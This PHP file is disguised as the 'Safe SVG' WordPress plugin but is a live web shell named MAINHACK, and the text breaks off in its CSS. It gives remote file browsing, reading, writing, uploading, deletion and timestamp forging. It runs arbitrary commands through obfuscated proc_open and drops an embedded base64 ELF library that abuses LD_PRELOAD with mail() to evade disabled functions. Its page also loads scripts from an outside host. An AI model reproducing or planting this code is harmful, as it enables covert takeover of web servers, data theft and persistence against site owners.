File: C:/Apache24/htdocs/upload.php
<?php
/**
* Plugin Name: Safe SVG
* Plugin URI: https://wordpress.org/plugins/safe-svg/
* Description: Enable SVG uploads and sanitize them to stop XML/SVG vulnerabilities in your WordPress website
* Version: 2.3.2
* Requires at least: 6.6
* Requires PHP: 7.4
* Author: 10up
* Author URI: https://10up.com
* License: GPL-2.0-or-later
* License URI: https://spdx.org/licenses/GPL-2.0-or-later.html
* Text Domain: safe-svg
* Domain Path: /languages
*
* @package safe-svg
*/
header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
// --- START: Injected logic ---
$hook = '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AAABwAAAAwAAAAAAAAAAAAAAEiD7AhIiwW9CCAASIXAdAL/0EiDxAjDAP810gggAP8l1AggAA8fQAD/JdIIIABoAAAAAOng/////yXKCCAAaAEAAADp0P////8lwgggAGgCAAAA6cD/////JboIIABoAwAAAOmw/////yWyCCAAaAQAAADpoP////8lqgggAGgFAAAA6ZD/////JaIIIABoBgAAAOmA/////yWaCCAAaAcAAADpcP////8lkgggAGgIAAAA6WD/////JSIIIABmkAAAAAAAAAAASI09gQggAEiNBYEIIABVSCn4SInlSIP4DnYVSIsF1gcgAEiFwHQJXf/gZg8fRAAAXcMPH0AAZi4PH4QAAAAAAEiNPUEIIABIjTU6CCAAVUgp/kiJ5UjB/gNIifBIweg/SAHGSNH+dBhIiwWhByAASIXAdAxd/+BmDx+EAAAAAABdww8fQABmLg8fhAAAAAAAgD3xByAAAHUnSIM9dwcgAABVSInldAxIiz3SByAA6D3////oSP///13GBcgHIAAB88MPH0AAZi4PH4QAAAAAAEiNPVkFIABIgz8AdQvpXv///2YPH0QAAEiLBRkHIABIhcB06VVIieX/0F3pQP///1VIieVIjT16AAAA6FD+//++/wEAAEiJx+iT/v//SI09YQAAAOg3/v//SInH6E/+//+QXcNVSInlvgEAAAC/AQAAAOhZ/v//6JT+//+FwHQKvwAAAADodv7//5Bdw1VIieVIjT0lAAAA6FP+///o/v3//+gZ/v//kF3DAABIg+wISIPECMNDSEFOS1JPAExEX1BSRUxPQUQAARsDOzQAAAAFAAAAuP3//1AAAABY/v//eAAAAGj///+QAAAAnP///7AAAADF////0AAAAAAAAAAUAAAAAAAAAAF6UgABeBABGwwHCJABAAAkAAAAHAAAAGD9//+gAAAAAA4QRg4YSg8LdwiAAD8aOyozJCIAAAAAFAAAAEQAAADY/f//CAAAAAAAAAAAAAAAHAAAAFwAAADQ/v//NAAAAABBDhCGAkMNBm8MBwgAAAAcAAAAfAAAAOT+//8pAAAAAEEOEIYCQw0GZAwHCAAAABwAAACcAAAA7f7//x0AAAAAQQ4QhgJDDQZYDAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAgAAAAAAAAAAAAAAAAAAHAIAAAAAAAAAAAAAAAAAAABAAAAAAAAALsAAAAAAAAADAAAAAAAAAAYBwAAAAAAAA0AAAAAAAAAXAkAAAAAAAAZAAAAAAAAAPgNIAAAAAAAGwAAAAAAAAAQAAAAAAAAABoAAAAAAAAACA4gAAAAAAAcAAAAAAAAAAgAAAAAAAAA9f7/bwAAAADwAQAAAAAAAAUAAAAAAAAAMAQAAAAAAAAGAAAAAAAAADgCAAAAAAAACgAAAAAAAADpAAAAAAAAAAsAAAAAAAAAGAAAAAAAAAADAAAAAAAAAAAQIAAAAAAAAgAAAAAAAADYAAAAAAAAABQAAAAAAAAABwAAAAAAAAAXAAAAAAAAAEAGAAAAAAAABwAAAAAAAABoBQAAAAAAAAgAAAAAAAAA2AAAAAAAAAAJAAAAAAAAABgAAAAAAAAA/v//bwAAAABIBQAAAAAAAP///28AAAAAAQAAAAAAAADw//9vAAAAABoFAAAAAAAA+f//bwAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgOIAAAAAAAAAAAAAAAAAAAAAAAAAAAAEYHAAAAAAAAVgcAAAAAAABmBwAAAAAAAHYHAAAAAAAAhgcAAAAAAACWBwAAAAAAAKYHAAAAAAAAtgcAAAAAAADGBwAAAAAAAGAQIAAAAAAAR0NDOiAoRGViaWFuIDYuMy4wLTE4K2RlYl91MSkgNi4zLjAgMjAxNzA1MTYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAQDIAQAAAAAAAAAAAAAAAAAAAAAAAAMAAgDwAQAAAAAAAAAAAAAAAAAAAAAAAAMAAwA4AgAAAAAAAAAAAAAAAAAAAAAAAAMABAAwBAAAAAAAAAAAAAAAAAAAAAAAAAMABQAaBQAAAAAAAAAAAAAAAAAAAAAAAAMABgBIBQAAAAAAAAAAAAAAAAAAAAAAAAMABwBoBQAAAAAAAAAAAAAAAAAAAAAAAAMACABABgAAAAAAAAAAAAAAAAAAAAAAAAMACQAYBwAAAAAAAAAAAAAAAAAAAAAAAAMACgAwBwAAAAAAAAAAAAAAAAAAAAAAAAMACwDQBwAAAAAAAAAAAAAAAAAAAAAAAAMADADgBwAAAAAAAAAAAAAAAAAAAAAAAAMADQBcCQAAAAAAAAAAAAAAAAAAAAAAAAMADgBlCQAAAAAAAAAAAAAAAAAAAAAAAAMADwB4CQAAAAAAAAAAAAAAAAAAAAAAAAMAEACwCQAAAAAAAAAAAAAAAAAAAAAAAAMAEQD4DSAAAAAAAAAAAAAAAAAAAAAAAAMAEgAIDiAAAAAAAAAAAAAAAAAAAAAAAAMAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAMAFAAYDiAAAAAAAAAAAAAAAAAAAAAAAAMAFQDYDyAAAAAAAAAAAAAAAAAAAAAAAAMAFgAAECAAAAAAAAAAAAAAAAAAAAAAAAMAFwBgECAAAAAAAAAAAAAAAAAAAAAAAAMAGABoECAAAAAAAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAADAAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAGQAAAAIADADgBwAAAAAAAAAAAAAAAAAAGwAAAAIADAAgCAAAAAAAAAAAAAAAAAAALgAAAAIADABwCAAAAAAAAAAAAAAAAAAARAAAAAEAGABoECAAAAAAAAEAAAAAAAAAUwAAAAEAEgAIDiAAAAAAAAAAAAAAAAAAegAAAAIADACwCAAAAAAAAAAAAAAAAAAAhgAAAAEAEQD4DSAAAAAAAAAAAAAAAAAApQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAAQAAAAQA8f8AAAAAAAAAAAAAAAAAAAAArAAAAAEAEABoCgAAAAAAAAAAAAAAAAAAugAAAAEAEwAQDiAAAAAAAAAAAAAAAAAAAAAAAAQA8f8AAAAAAAAAAAAAAAAAAAAAxgAAAAEAFwBgECAAAAAAAAAAAAAAAAAA0wAAAAEAFAAYDiAAAAAAAAAAAAAAAAAA3AAAAAAADwB4CQAAAAAAAAAAAAAAAAAA7wAAAAEAFwBoECAAAAAAAAAAAAAAAAAA+wAAAAEAFgAAECAAAAAAAAAAAAAAAAAAEQEAABIAAAAAAAAAAAAAAAAAAAAAAAAAJQEAACAAAAAAAAAAAAAAAAAAAAAAAAAAQQEAABAAFwBoECAAAAAAAAAAAAAAAAAASAEAABIADAAUCQAAAAAAACkAAAAAAAAAUgEAABIADQBcCQAAAAAAAAAAAAAAAAAAWAEAABIAAAAAAAAAAAAAAAAAAAAAAAAAbAEAABIADADgCAAAAAAAADQAAAAAAAAAcAEAABIAAAAAAAAAAAAAAAAAAAAAAAAAhAEAACAAAAAAAAAAAAAAAAAAAAAAAAAAkwEAABIADAA9CQAAAAAAAB0AAAAAAAAAnQEAABAAGABwECAAAAAAAAAAAAAAAAAAogEAABAAGABoECAAAAAAAAAAAAAAAAAArgEAABIAAAAAAAAAAAAAAAAAAAAAAAAAwQEAACAAAAAAAAAAAAAAAAAAAAAAAAAA1QEAABIAAAAAAAAAAAAAAAAAAAAAAAAA6wEAABIAAAAAAAAAAAAAAAAAAAAAAAAA/QEAACAAAAAAAAAAAAAAAAAAAAAAAAAAFwIAACIAAAAAAAAAAAAAAAAAAAAAAAAAMwIAABIACQAYBwAAAAAAAAAAAAAAAAAAOQIAABIAAAAAAAAAAAAAAAAAAAAAAAAAAGNydHN0dWZmLmMAX19KQ1JfTElTVF9fAGRlcmVnaXN0ZXJfdG1fY2xvbmVzAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABjb21wbGV0ZWQuNjk3MgBfX2RvX2dsb2JhbF9kdG9yc19hdXhfZmluaV9hcnJheV9lbnRyeQBmcmFtZV9kdW1teQBfX2ZyYW1lX2R1bW15X2luaXRfYXJyYXlfZW50cnkAaG9vay5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kc29faGFuZGxlAF9EWU5BTUlDAF9fR05VX0VIX0ZSQU1FX0hEUgBfX1RNQ19FTkRfXwBfR0xPQkFMX09GRlNFVF9UQUJMRV8AZ2V0ZW52QEBHTElCQ18yLjIuNQBfSVRNX2RlcmVnaXN0ZXJUTUNsb25lVGFibGUAX2VkYXRhAGRhZW1vbml6ZQBfZmluaQBzeXN0ZW1AQEdMSUJDXzIuMi41AHB3bgBzaWduYWxAQEdMSUJDXzIuMi41AF9fZ21vbl9zdGFydF9fAHByZWxvYWRtZQBfZW5kAF9fYnNzX3N0YXJ0AGNobW9kQEBHTElCQ18yLjIuNQBfSnZfUmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjIuNQBleGl0QEBHTElCQ18yLjIuNQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplQEBHTElCQ18yLjIuNQBfaW5pdABmb3JrQEBHTElCQ18yLjIuNQAALnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbGEuZHluAC5yZWxhLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZV9oZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2FycmF5AC5qY3IALmR5bmFtaWMALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsAAAAHAAAAAgAAAAAAAADIAQAAAAAAAMgBAAAAAAAAJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAuAAAA9v//bwIAAAAAAAAA8AEAAAAAAADwAQAAAAAAAEQAAAAAAAAAAwAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAOAAAAAsAAAACAAAAAAAAADgCAAAAAAAAOAIAAAAAAAD4AQAAAAAAAAQAAAABAAAACAAAAAAAAAAYAAAAAAAAAEAAAAADAAAAAgAAAAAAAAAwBAAAAAAAADAEAAAAAAAA6QAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAABIAAAA////bwIAAAAAAAAAGgUAAAAAAAAaBQAAAAAAACoAAAAAAAAAAwAAAAAAAAACAAAAAAAAAAIAAAAAAAAAVQAAAP7//28CAAAAAAAAAEgFAAAAAAAASAUAAAAAAAAgAAAAAAAAAAQAAAABAAAACAAAAAAAAAAAAAAAAAAAAGQAAAAEAAAAAgAAAAAAAABoBQAAAAAAAGgFAAAAAAAA2AAAAAAAAAADAAAAAAAAAAgAAAAAAAAAGAAAAAAAAABuAAAABAAAAEIAAAAAAAAAQAYAAAAAAABABgAAAAAAANgAAAAAAAAAAwAAABYAAAAIAAAAAAAAABgAAAAAAAAAeAAAAAEAAAAGAAAAAAAAABgHAAAAAAAAGAcAAAAAAAAXAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAHMAAAABAAAABgAAAAAAAAAwBwAAAAAAADAHAAAAAAAAoAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAB+AAAAAQAAAAYAAAAAAAAA0AcAAAAAAADQBwAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAhwAAAAEAAAAGAAAAAAAAAOAHAAAAAAAA4AcAAAAAAAB6AQAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAI0AAAABAAAABgAAAAAAAABcCQAAAAAAAFwJAAAAAAAACQAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAACTAAAAAQAAAAIAAAAAAAAAZQkAAAAAAABlCQAAAAAAABMAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAmwAAAAEAAAACAAAAAAAAAHgJAAAAAAAAeAkAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAKkAAAABAAAAAgAAAAAAAACwCQAAAAAAALAJAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACzAAAADgAAAAMAAAAAAAAA+A0gAAAAAAD4DQAAAAAAABAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAvwAAAA8AAAADAAAAAAAAAAgOIAAAAAAACA4AAAAAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAMsAAAABAAAAAwAAAAAAAAAQDiAAAAAAABAOAAAAAAAACAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADQAAAABgAAAAMAAAAAAAAAGA4gAAAAAAAYDgAAAAAAAMABAAAAAAAABAAAAAAAAAAIAAAAAAAAABAAAAAAAAAAggAAAAEAAAADAAAAAAAAANgPIAAAAAAA2A8AAAAAAAAoAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAANkAAAABAAAAAwAAAAAAAAAAECAAAAAAAAAQAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADiAAAAAQAAAAMAAAAAAAAAYBAgAAAAAABgEAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAA6AAAAAgAAAADAAAAAAAAAGgQIAAAAAAAaBAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAO0AAAABAAAAMAAAAAAAAAAAAAAAAAAAAGgQAAAAAAAALQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAgAAAAAAAAAAAAAAAAAAAAAAAACYEAAAAAAAABgGAAAAAAAAGwAAAC0AAAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAsBYAAAAAAABLAgAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAPsYAAAAAAAA9gAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAA=';
// --- END: Injected logic ---
function hunterEncryptDecrypt($input, $key="12") {
$output = '';
for($i = 0; $i < strlen($input); $i++) {
$output .= $input[$i] ^ $key[$i % strlen($key)];
}
return $output;
}
function listing_all_directory() {
$path = $_COOKIE['path'] ?: getcwd();
$result = array();
$date_format = "d-m-Y H:i:s";
if ($handle = opendir($path)) {
while (false !== ($dir = readdir($handle))) {
if ($dir === '.' || $dir === '..') {
continue;
}
$full_path = "$path/$dir";
$is_dir = is_dir($full_path);
$tmp_result = array(
'path' => htmlspecialchars($full_path),
'is_writable' => is_writable($full_path),
'is_dir' => $is_dir,
'date' => date($date_format, filemtime($full_path)),
'size' => $is_dir ? "" : round(filesize($full_path) / 1024, 2),
);
$result[] = $tmp_result;
}
closedir($handle);
}
return $result;
}
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : false;
if(!$action) {
main();
menu();
}
function decode_char($string) {
return hunterEncryptDecrypt(hex2bin($string));
}
switch ($action) {
case 'd':
die(json_encode(listing_all_directory()));
break;
case 'r':
if($_SERVER['REQUEST_METHOD'] == 'POST') {
$data = json_decode(file_get_contents("php://input"), true);
$content = show_base_data()($data['content']);
$filename = decode_char($_COOKIE['filename']);
$message['success'] = fm_write_file($filename, $content);
die(json_encode($message));
}
main();
$content = customize_read_file(decode_char($_COOKIE['filename'])) ;
show_text_area(htmlspecialchars($content));
break;
case 'cr':
main();
show_text_area("");
break;
case 'ul':
$filename = decode_char($_COOKIE['filename']);
if(show_un()($filename)) {
$message['success'] = true;
} else {
$message['success'] = false;
}
die(json_encode($message));
break;
case 'up':
$file = $_FILES['import_file'];
$tmp_name = $file['tmp_name'];
$content = customize_read_file($tmp_name);
if(isset($_POST['by'])) {
$content = show_base_data()($content);
}
$path = $_COOKIE['path'] ?: getcwd();
$name = $file['name'];
$destination = "$path/$name";
$message['success'] = $content && fm_write_file($destination, $content) ?: rename($tmp_name, $destination);
die(json_encode($message));
break;
case 're':
$filename = decode_char($_COOKIE['filename']);
$path = $_COOKIE['path'];
if($_SERVER['REQUEST_METHOD'] == "POST") {
$old_filename = "$path/$filename";
$new = $_POST['new'];
$new_filename = "$path/$new";
$message['success'] = rename($old_filename, $new_filename);
die(json_encode($message));
}
break;
case 'to':
$filename = decode_char($_COOKIE['filename']);
if($_SERVER['REQUEST_METHOD'] == 'POST') {
$date = $_POST['date'];
$str_date = strtotime($date);
$message['success'] = touch($filename, $str_date);
clearstatcache(true, $filename);
die(json_encode($message));
}
break;
// --- START: New command cases ---
case 'cmd_normal':
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$data = json_decode(file_get_contents("php://input"), true);
$command = $data['cmd'];
$pp = "p"."r"."o"."c"."_"."o"."p"."e"."n";
$pc = "f"."c"."l"."o"."s"."e";
$ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e";
$stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s";
$descriptorspec = [
0 => ['pipe', 'r'],
1 => ['pipe', 'w'],
2 => ['pipe', 'w']
];
$process = $pp($command, $descriptorspec, $pipes);
if (is_resource($process)) {
$output = $stg($pipes[1]);
$errors = $stg($pipes[2]);
$pc($pipes[1]);
$pc($pipes[2]);
$ppc($process);
if (!empty($errors)) {
echo htmlspecialchars($errors);
} else {
echo htmlspecialchars($output);
}
} else {
echo 'Error: Failed to execute command! The proc_open function might be disabled.';
}
exit;
}
break;
case 'cmd_bypass':
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$data = json_decode(file_get_contents("php://input"), true);
$cmdd = $data['cmd'];
$p = "p"."u"."t"."e"."n"."v";
$a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s";
$m = "m"."a"."i"."l";
$base = "ba"."se"."64"."_"."de"."co"."de";
$en = "ba"."se"."64"."_"."en"."co"."de";
$drnm = "d"."i"."r"."n"."a"."m"."e";
$currentFilePath = $_SERVER['PHP_SELF'];
$doc = $_SERVER['DOCUMENT_ROOT'];
$directoryPath = $drnm($currentFilePath);
$full = $doc . $directoryPath;
$so_path = $full . '/chankro.so';
$socket_path = $full . '/acpid.socket';
@$a($so_path, $base($hook));
$command_to_run = $cmdd." > test.txt";
$meterpreter = $en($command_to_run);
@$a($socket_path, $base($meterpreter));
@$p('CHANKRO=' . $socket_path);
@$p('LD_PRELOAD=' . $so_path);
@$m('a','a','a','a');
$response = 'Bypass command sent.\n\n' .
'Result written to: test.txt in the script\'s directory.\n' .
'Refresh the file list to see it.\n\n' .
'NOTE: This method requires write permissions and the mail() & putenv() functions to be enabled.';
echo $response;
exit;
}
break;
// --- END: New command cases ---
default:
break;
}
function customize_read_file($file) {
if(!file_exists($file) || filesize($file) === 0) {
return '';
}
$content = @file_get_contents($file);
if ($content !== false) {
return $content;
}
$handle = @fopen($file, 'r');
if($handle) {
$content = @fread($handle, filesize($file));
@fclose($handle);
if($content) {
return $content;
}
}
return '';
}
function show_file_contents() {
$file = "file_";
$old = "get_";
$contents = "contents";
return "$file$old$contents";
}
function show_text_area($content) {
$filename = decode_char($_COOKIE['filename']);
echo "
<p><a href='?' id='back_menu'>< Back</a></p>
<p>$filename</p>
<textarea width='100%' id='content' cols='20' rows='30' style='margin-top: 10px'>$content</textarea>
<button type='submit' class='textarea-button' onclick='textarea_handle()'>Submit</button>
";
}
function show_base_data() {
$alvian = "base";
$nadir = "64_decode";
return "$alvian$nadir";
}
function fm_write_file($file, $content) {
if (function_exists('file_put_contents')) {
if (@file_put_contents($file, $content) !== false) {
return true;
}
}
if (function_exists('fopen')) {
$handle = @fopen($file, 'w');
if ($handle) {
if (@fwrite($handle, $content) !== false) {
@fclose($handle);
return true;
}
@fclose($handle);
}
}
return false;
}
function fm_make_request($url) {
if(function_exists("curl_init")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
return $output;
}
return show_file_contents()($url);
}
function show_un() {
$link = "link";
$unpad = "un";
return "$unpad$link";
}
function main() {
global $current_path;
$current_path = isset($_COOKIE['path']) ? $_COOKIE['path'] : false;
if(!$current_path) {
setcookie("path", getcwd());
$current_path = getcwd();
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>MAINHACK</title>
<link rel="icon" href="mainhack.ico" type="image/x-icon" />
<link rel="stylesheet" href="https://wordpress.zzna.ru/newb/all.min.css" />
<link rel="stylesheet" href="https://wordpress.zzna.ru/newb/styles.css" />
<script src="https://wordpress.zzna.ru/newb/script.js"></script>
<style>
/* --- START: Improved and new styles --- */
h1.mainhack-title {
color: red;
text-align: center;
margin-bottom: 20px;
font-family: Arial, sans-serif;
}
.main-menu {
display: flex;
align-items: center;
}
.main-menu .menu-item {
margin-right: 10px !important;
}
.main-menu .terminal-item {
margin-left: auto; /* Pushes terminal button to the right */
}
/* Modal Styles */
.modal-overlay {
display: none;
position: fixed;
z-index: 1000;
left: 0;
top: 0;
width: 100%;
height: 100%;
overflow: auto;
background-color: rgba(0,0,0,0.6);
}
.modal-content {
background-color: #2c2c2c;
margin: 10% auto;
padding: 20px;
border: 1px solid #888;
width: 80%;
max-width: 800px;
border-radius: 8px;
color: #f1f1f1;
box-shadow: 0 5px 15px rgba(0,0,0,0.5);
}
.modal-header {
